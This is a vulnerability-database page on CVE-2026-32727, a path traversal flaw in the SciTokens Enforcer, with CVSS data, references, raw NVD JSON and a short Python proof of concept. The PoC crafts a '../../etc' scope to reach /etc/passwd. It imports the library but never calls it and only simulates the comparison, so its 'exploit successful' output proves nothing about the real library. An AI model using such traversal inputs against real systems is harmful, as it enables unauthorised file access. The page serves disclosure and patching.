CVE-2026-32727

Description

SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.7, the Enforcer is vulnerable to a path traversal attack where an attacker can use dot-dot (..) in the scope claim of a token to escape the intended directory restriction. This occurs because the library normalizes both the authorized path (from the token) and the requested path (from the application) before comparing them using startswith. This issue has been patched in version 1.9.7.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:scitokens:scitokens_library:*:*:*:*:*:*:*:* - VULNERABLE

SciTokens < 1.9.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import scitokens
import os

# Conceptual Proof of Concept for CVE-2026-32727
# This demonstrates how a path traversal in the scope claim can bypass directory restrictions.

def simulate_vulnerable_enforcer(token_scope, requested_path):
    # Simulate the vulnerable normalization logic
    # In the vulnerable version, both paths are normalized before checking
    normalized_scope = os.path.normpath(token_scope)
    normalized_request = os.path.normpath(requested_path)
    
    # The vulnerability lies here: checking if request starts with scope after normalization
    # If scope is ../../etc and request is /etc/passwd, check passes
    if normalized_request.startswith(normalized_scope):
        return True
    return False

# Scenario: Attacker crafts a token with a scope that escapes the intended directory
malicious_scope = "/safe/uploads/../../etc" # Intended to restrict to /safe/uploads
requested_file = "/etc/passwd"

if simulate_vulnerable_enforcer(malicious_scope, requested_file):
    print(f"[+] EXPLOIT SUCCESSFUL: Access granted to {requested_file}")
else:
    print(f"[-] Access denied to {requested_file}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32727
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32727
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32727/
[4] VulDB https://vuldb.com/cve/CVE-2026-32727
[5] https://github.com/scitokens/scitokens/commit/2d1cc9e42bc944fe0bbc429b85d166e7156d53f9
[6] https://github.com/scitokens/scitokens/pull/230
[7] https://github.com/scitokens/scitokens/releases/tag/v1.9.7
[8] https://github.com/scitokens/scitokens/security/advisories/GHSA-3x2w-63fp-3qvw

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32727", "sourceIdentifier": "[email protected]", "published": "2026-03-31T03:15:57.340", "lastModified": "2026-04-03T17:26:41.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SciTokens is a reference library for generating and using SciTokens. Prior to version 1.9.7, the Enforcer is vulnerable to a path traversal attack where an attacker can use dot-dot (..) in the scope claim of a token to escape the intended directory restriction. This occurs because the library normalizes both the authorized path (from the token) and the requested path (from the application) before comparing them using startswith. This issue has been patched in version 1.9.7."}, {"lang": "es", "value": "SciTokens es una biblioteca de referencia para generar y usar SciTokens. Antes de la versión 1.9.7, el Enforcer es vulnerable a un ataque de salto de ruta donde un atacante puede usar punto-punto (..) en la declaración de alcance de un token para evadir la restricción de directorio prevista. Esto ocurre porque la biblioteca normaliza tanto la ruta autorizada (del token) como la ruta solicitada (de la aplicación) antes de compararlas usando startswith. Este problema ha sido parcheado en la versión 1.9.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:scitokens:scitokens_library:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.9.7", "matchCriteriaId": "8D402B23-94E7-4866-B628-DFCD1E58109E"}]}]}], "references": [{"url": "https://github.com/scitokens/scitokens/commit/2d1cc9e42bc944fe0bbc429b85d166e7156d53f9", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/scitokens/scitokens/pull/230", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/scitokens/scitokens/releases/tag/v1.9.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/scitokens/scitokens/security/advisories/GHSA-3x2w-63fp-3qvw", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}